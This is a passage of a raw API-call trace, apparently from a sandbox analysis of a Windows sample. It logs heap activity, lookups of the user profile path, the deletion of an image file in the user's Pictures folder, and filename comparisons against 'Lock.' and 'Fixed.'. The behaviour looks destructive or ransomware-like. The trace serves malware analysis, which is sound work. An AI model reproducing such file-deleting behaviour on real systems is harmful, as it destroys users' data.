lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.556] FreeLibrary (hLibModule=0x76390000) returned 1 [0210.556] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.556] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.556] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.556] CloseHandle (hObject=0x4dc) returned 1 [0210.558] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.558] CloseHandle (hObject=0x520) returned 1 [0210.560] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.561] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.561] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.561] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.561] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/ko-PEUGJ.png", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\ko-PEUGJ.png", lpFilePart=0x8cedf4*="ko-PEUGJ.png") returned 0x25 [0210.561] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\ko-PEUGJ.png" (normalized: "c:\\users\\fd1hvy\\pictures\\ko-peugj.png")) returned 0x20 [0210.561] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\ko-PEUGJ.png", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1bd0190, ftCreationTime.dwHighDateTime=0x1d5cc81, ftLastAccessTime.dwLowDateTime=0xb18eb580, ftLastAccessTime.dwHighDateTime=0x1d5cbfa, ftLastWriteTime.dwLowDateTime=0xb18eb580, ftLastWriteTime.dwHighDateTime=0x1d5cbfa, nFileSizeHigh=0x0, nFileSizeLow=0x8c04, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="ko-PEUGJ.png", cAlternateFileName="")) returned 0x9e2078 [0210.561] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\ko-PEUGJ.png" (normalized: "c:\\users\\fd1hvy\\pictures\\ko-peugj.png")) returned 1 [0210.565] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1bd0190, ftCreationTime.dwHighDateTime=0x1d5cc81, ftLastAccessTime.dwLowDateTime=0xb18eb580, ftLastAccessTime.dwHighDateTime=0x1d5cbfa, ftLastWriteTime.dwLowDateTime=0xb18eb580, ftLastWriteTime.dwHighDateTime=0x1d5cbfa, nFileSizeHigh=0x0, nFileSizeLow=0x8c04, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="ko-PEUGJ.png", cAlternateFileName="")) returned 0 [0210.565] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0210.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0210.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.566] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0210.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0210.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0210.566] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa678 [0210.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7c8 [0210.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0210.566] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0210.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0210.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0210.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0210.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0210.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0210.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0210.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0210.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0210.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4c) returned 0x29eac38 [0210.568] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/ko-PEUGJ.png", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\ko-PEUGJ.png", lpFilePart=0x8cf650*="ko-PEUGJ.png") returned 0x25 [0210.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eac38 | out: hHeap=0x2af0000) returned 1 [0210.568] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\ko-PEUGJ.png" (normalized: "c:\\users\\fd1hvy\\pictures\\ko-peugj.png")) returned 0xffffffff [0210.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0210.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0210.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.568] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0210.568] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.568] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0210.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0210.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0210.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktNHTaW.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tNHTaW.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NHTaW.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTaW.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TaW.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aW.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0210.569] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0210.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0210.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0210.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0210.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0210.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0210.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0210.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0210.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktNHTaW.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tNHTaW.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NHTaW.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTaW.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TaW.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aW.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0210.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0210.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0210.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0210.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0210.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0210.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.571] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0210.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0210.571] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0210.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0210.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ad8 [0210.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0210.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0210.572] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7c8 [0210.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa720 [0210.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0210.572] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0210.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0210.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0210.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0210.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 